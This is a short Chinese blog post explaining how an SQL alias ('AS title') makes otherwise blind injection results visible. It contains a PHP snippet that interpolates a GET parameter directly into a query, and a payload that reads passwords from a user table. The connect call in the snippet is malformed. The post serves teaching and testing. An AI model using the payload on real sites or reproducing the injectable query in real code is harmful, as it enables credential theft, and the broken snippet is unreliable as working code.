时间盲注——AS别名让盲注不盲

用处

页面存在时间盲注,注入成功了,你啥也看不到。
这只是为了能够查看到注入后的结果

网站部分源代码
<?php
$conn = mysqli_("127.0.0.1","root","root","test");
$res = mysqli_query($conn, "SELECT ${_GET['id']}, content FROM wp_news");
$row = mysqli_fetch_array($res);
echo "<h1>".$row["title"]."</h1>";
echo "<br>";
echo "<h1>".$row['content']."</h1>";
?>
注入语句
?id = (select pwd from wp_user) as title
原理

代码

echo "<h1>".$row["title"]."</h1>"

中的title,被你赋值成了注入语句的结果

posted @ 2020-12-16 12:54  Throokie  阅读(57)  评论(0编辑  收藏  举报